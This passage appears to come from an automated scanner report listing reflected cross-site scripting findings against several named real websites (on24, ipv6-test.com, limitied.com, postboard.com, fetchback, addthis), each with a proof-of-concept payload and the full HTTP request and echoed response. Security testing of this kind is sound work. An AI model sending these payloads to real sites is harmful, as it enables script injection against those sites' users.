GET /eventRegistration/eventRegistrationServlet?eventid=304201&sessionid=1&key=F6F93BDA53DEDC5D3EB1DE681ED7D7A9&partnerref=ilvbannerada4681</script><script>alert(1)</script>0bf32b76204&referrer= HTTP/1.1
Host: event.on24.com
Proxy-Connection: keep-alive
Referer: http://event.on24.com/r.htm?e=304201&s=1&k=F6F93BDA53DEDC5D3EB1DE681ED7D7A9&partnerref=ilvbannerad
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 02:50:08 GMT
Set-Cookie: JSESSIONID=Xy4ihFJcPyLOs2PoSBeL9WWnosdGCCQrWISfS7bHiubjJVtmmK0x!1057255888; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close

<html><head></head><body onload='redirectIt();'><center><!--h6>Thank you. Please wait a few seconds while you are redirected (or <a href='https://event.on24.com/eventRegistration/EventLobbyServlet?tar
...[SNIP]...
rectIt() {var lobbyRedirectUrl='https://event.on24.com/eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=304201&sessionid=1&key=F6F93BDA53DEDC5D3EB1DE681ED7D7A9&partnerref=ilvbannerada4681</script><script>alert(1)</script>0bf32b76204&sourcepage=register';location.href=lobbyRedirectUrl;}</script>
...[SNIP]...

2.9. http://ipv6-test.com/validate.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ipv6-test.com
Path:	/validate.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 26056'><script>alert(1)</script>aa3b948562f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26056\'><script>alert(1)</script>aa3b948562f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /validate.php?url=ref/26056'><script>alert(1)</script>aa3b948562ferer HTTP/1.1
Host: ipv6-test.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 02:51:34 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=2fa70eb5c43fffa0eab333961b807391; expires=Sat, 23 Apr 2011 03:06:34 GMT; path=/; domain=.ipv6-test.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 12630

<!DOCTYPE html>
<html>
<head>
<title>IPv6 test - web site reachability</title>
<link rel="stylesheet" type="text/css" href="/style.css" />
<link rel="shortcut icon" href="/favicon.ico" />
<meta http-e
...[SNIP]...
<input type='text' id='url_input' value='ref/26056\'><script>alert(1)</script>aa3b948562ferer'>
...[SNIP]...

2.10. http://ipv6-test.com/validate.php [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ipv6-test.com
Path:	/validate.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 87300'><script>alert(1)</script>229965bab48 was submitted in the url parameter. This input was echoed as 87300\'><script>alert(1)</script>229965bab48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /validate.php?url=referer87300'><script>alert(1)</script>229965bab48 HTTP/1.1
Host: ipv6-test.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 02:50:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=5bb561f853214f3951821c482cb59155; expires=Sat, 23 Apr 2011 03:05:18 GMT; path=/; domain=.ipv6-test.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 12629

<!DOCTYPE html>
<html>
<head>
<title>IPv6 test - web site reachability</title>
<link rel="stylesheet" type="text/css" href="/style.css" />
<link rel="shortcut icon" href="/favicon.ico" />
<meta http-e
...[SNIP]...
<input type='text' id='url_input' value='referer87300\'><script>alert(1)</script>229965bab48'>
...[SNIP]...

2.11. http://limitied.com/fullpop.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://limitied.com
Path:	/fullpop.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcb25'%3balert(1)//9083a9e5ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fcb25';alert(1)//9083a9e5ef9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fullpop.php?rurl=http%3A%2F%2Fwww.munky.com%2Fmain.php%3Fnopop%3/fcb25'%3balert(1)//9083a9e5ef9Dyes HTTP/1.1
Host: limitied.com
Proxy-Connection: keep-alive
Referer: http://limitied.com/tg.php?uid=w054db2577acff3f7.21429672&src=&cat=general&kw=&sc=general
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=w054db2577acff3f7.21429672

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:37:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 232
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html> <head>
<title>-</title>
<script>
window.moveTo(0,0);
self.location = 'http://www.munky.com/main.php?nopop%3/fcb25';alert(1)//9083a9e5ef9Dyes';
</script>
...[SNIP]...

2.12. http://limitied.com/fullpop.php [rurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://limitied.com
Path:	/fullpop.php

Issue detail

The value of the rurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3064b'%3balert(1)//11436f409e2 was submitted in the rurl parameter. This input was echoed as 3064b';alert(1)//11436f409e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fullpop.php?rurl=http%3A%2F%2Fwww.munky.com%2Fmain.php%3Fnopop%3Dyes3064b'%3balert(1)//11436f409e2 HTTP/1.1
Host: limitied.com
Proxy-Connection: keep-alive
Referer: http://limitied.com/tg.php?uid=w054db2577acff3f7.21429672&src=&cat=general&kw=&sc=general
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=w054db2577acff3f7.21429672

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:37:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 229
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html> <head>
<title>-</title>
<script>
window.moveTo(0,0);
self.location = 'http://www.munky.com/main.php?nopop=yes3064b';alert(1)//11436f409e2';
</script>
...[SNIP]...

2.13. http://limitied.com/search.php [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://limitied.com
Path:	/search.php

Issue detail

The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f8e"><script>alert(1)</script>e4f553bbc04 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?uid=w054db2577acff3f7.2142967262f8e"><script>alert(1)</script>e4f553bbc04&src=d HTTP/1.1
Host: limitied.com
Proxy-Connection: keep-alive
Referer: http://limitied.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=w054db2577acff3f7.21429672

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:37:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 7277
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:la
...[SNIP]...
<input type="hidden" name="uid" value="w054db2577acff3f7.2142967262f8e"><script>alert(1)</script>e4f553bbc04">
...[SNIP]...

2.14. http://limitied.com/tg.php [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://limitied.com
Path:	/tg.php

Issue detail

The value of the uid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a47c'%3balert(1)//6c3ff4413e6 was submitted in the uid parameter. This input was echoed as 3a47c';alert(1)//6c3ff4413e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tg.php?uid=w054db2577acff3f7.214296723a47c'%3balert(1)//6c3ff4413e6&src=&cat=general&kw=&sc=general HTTP/1.1
Host: limitied.com
Proxy-Connection: keep-alive
Referer: http://limitied.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=w054db2577acff3f7.21429672

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:37:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 1943
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>

<script type='text/javascript'><!--//<![CDATA[
function pop_ax() {
   if (--pop_cnt==0) {
       return;
   }
   var x=setTimeout('pop_ax()',750);
   var o=window.document.getElementById('p
...[SNIP]...
<im'+'g src="/track.php?uid=w054db2577acff3f7.214296723a47c';alert(1)//6c3ff4413e6&d=limitied.com&sr='+sr+'" width=1 height=1>
...[SNIP]...

2.15. http://limitied.com/tg.php [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://limitied.com
Path:	/tg.php

Issue detail

The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beb03"><script>alert(1)</script>47ed57a7954 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tg.php?uid=w054db2577acff3f7.21429672beb03"><script>alert(1)</script>47ed57a7954&src=&cat=general&kw=&sc=general HTTP/1.1
Host: limitied.com
Proxy-Connection: keep-alive
Referer: http://limitied.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=w054db2577acff3f7.21429672

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:37:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 1973
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>

<script type='text/javascript'><!--//<![CDATA[
function pop_ax() {
   if (--pop_cnt==0) {
       return;
   }
   var x=setTimeout('pop_ax()',750);
   var o=window.document.getElementById('p
...[SNIP]...
<a href="/link.php?uid=w054db2577acff3f7.21429672beb03"><script>alert(1)</script>47ed57a7954&d=limitied.com">
...[SNIP]...

2.16. http://pixel.fetchback.com/serve/fb/pdc [name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 2a101<x%20style%3dx%3aexpression(alert(1))>31e51dba395 was submitted in the name parameter. This input was echoed as 2a101<x style=x:expression(alert(1))>31e51dba395 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing2a101<x%20style%3dx%3aexpression(alert(1))>31e51dba395&sid=3236 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.bathandbodyworks.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303179672_1660:0; uid=1_1303179672_1303179323923:6792170478871670; kwd=1_1303179672; sit=1_1303179672_782:349:0; cre=1_1303179672; bpd=1_1303179672; apd=1_1303179672; scg=1_1303179672; ppd=1_1303179672; afl=1_1303179672

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:40:20 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303533620_1660:353948; Domain=.fetchback.com; Expires=Thu, 21-Apr-2016 04:40:20 GMT; Path=/
Set-Cookie: uid=1_1303533620_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Thu, 21-Apr-2016 04:40:20 GMT; Path=/
Set-Cookie: kwd=1_1303533620; Domain=.fetchback.com; Expires=Thu, 21-Apr-2016 04:40:20 GMT; Path=/
Set-Cookie: sit=1_1303533620_782:354297:353948; Domain=.fetchback.com; Expires=Thu, 21-Apr-2016 04:40:20 GMT; Path=/
Set-Cookie: cre=1_1303533620; Domain=.fetchback.com; Expires=Thu, 21-Apr-2016 04:40:20 GMT; Path=/
Set-Cookie: bpd=1_1303533620; Domain=.fetchback.com; Expires=Thu, 21-Apr-2016 04:40:20 GMT; Path=/
Set-Cookie: apd=1_1303533620; Domain=.fetchback.com; Expires=Thu, 21-Apr-2016 04:40:20 GMT; Path=/
Set-Cookie: scg=1_1303533620; Domain=.fetchback.com; Expires=Thu, 21-Apr-2016 04:40:20 GMT; Path=/
Set-Cookie: ppd=1_1303533620; Domain=.fetchback.com; Expires=Thu, 21-Apr-2016 04:40:20 GMT; Path=/
Set-Cookie: afl=1_1303533620; Domain=.fetchback.com; Expires=Thu, 21-Apr-2016 04:40:20 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 23 Apr 2011 04:40:20 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

2.17. http://postboard.com/lander.php [domain parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://postboard.com
Path:	/lander.php

Issue detail

The value of the domain request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0c75'%3balert(1)//8015f95e233 was submitted in the domain parameter. This input was echoed as f0c75';alert(1)//8015f95e233 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /lander.php?domain=limitied.comf0c75'%3balert(1)//8015f95e233&target=g HTTP/1.1
Host: postboard.com
Proxy-Connection: keep-alive
Referer: http://limitied.com/search.php?uid=w054db2577acff3f7.21429672&src=d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:37:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 3155
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:la
...[SNIP]...
ics',
       //add_title: "Have a question about anything, or something you'd like to share? Leave chatr, it feels good!",
       add_title: "Ask a question and let the network respond!",
       domain:'limitied.comf0c75';alert(1)//8015f95e233',
       src_domain:'limitied.comf0c75';alert(1)//8015f95e233',
       topics_per_page: 5,    // shorter display, so less topics per page
       refresh_rate:2500,
       auto_pop_delay:2000,
       target: 'g',

       classif
...[SNIP]...

2.18. http://postboard.com/lander.php [target parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://postboard.com
Path:	/lander.php

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab679'%3balert(1)//46dbf201f17 was submitted in the target parameter. This input was echoed as ab679';alert(1)//46dbf201f17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /lander.php?domain=limitied.com&target=gab679'%3balert(1)//46dbf201f17 HTTP/1.1
Host: postboard.com
Proxy-Connection: keep-alive
Referer: http://limitied.com/search.php?uid=w054db2577acff3f7.21429672&src=d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:37:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 3071
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:la
...[SNIP]...
e network respond!",
       domain:'limitied.com',
       src_domain:'limitied.com',
       topics_per_page: 5,    // shorter display, so less topics per page
       refresh_rate:2500,
       auto_pop_delay:2000,
       target: 'gab679';alert(1)//46dbf201f17',

       classification: '',
       chatr_id: '',
       question_mode_func: function() {
               qp = new CP.Question;
               qp.init({
                   container_id: 'pad_view',
                   title:'questions',
                   src_domain:'limitied.c
...[SNIP]...

2.19. http://www.addthis.com/analytics [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/analytics

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4a19"-alert(1)-"775ca0acb7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /analyticsf4a19"-alert(1)-"775ca0acb7d HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; PHPSESSID=nmivqb66311fd27rub5prl9gn6; ana_svc=cb; Coyote-2-a0f0083=a0f0232:0; __utmz=56306477.1303530430.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=56306477.656125860.1303530430.1303530430.1303530430.1; __utmc=56306477; __utmb=56306477.1.10.1303530430; uid=4dab4fa85facd099; psc=3; _chartbeat2=v6gcvdw86l4w274q

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:56:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/analyticsf4a19"-alert(1)-"775ca0acb7d";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.20. http://www.addthis.com/analytics [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/analytics

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8175e<script>alert(1)</script>ef9d03e8c6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /analytics8175e<script>alert(1)</script>ef9d03e8c6a HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; PHPSESSID=nmivqb66311fd27rub5prl9gn6; ana_svc=cb; Coyote-2-a0f0083=a0f0232:0; __utmz=56306477.1303530430.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=56306477.656125860.1303530430.1303530430.1303530430.1; __utmc=56306477; __utmb=56306477.1.10.1303530430; uid=4dab4fa85facd099; psc=3; _chartbeat2=v6gcvdw86l4w274q

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:56:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>analytics8175e<script>alert(1)</script>ef9d03e8c6a</strong>
...[SNIP]...

2.21. http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f09e<script>alert(1)</script>335130eefa3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog9f09e<script>alert(1)</script>335130eefa3/wp-content/themes/addthis3/images/bkg-btn-grey.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=omkogtlgh41pttjqbil2c638s1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>blog9f09e<script>alert(1)</script>335130eefa3/wp-content/themes/addthis3/images/bkg-btn-grey.gif</strong>
...[SNIP]...

2.22. http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7642a"-alert(1)-"ac307bfde67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blog7642a"-alert(1)-"ac307bfde67/wp-content/themes/addthis3/images/bkg-btn-grey.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=79hn0kqvhdr2unnmmejcfd0440; path=/
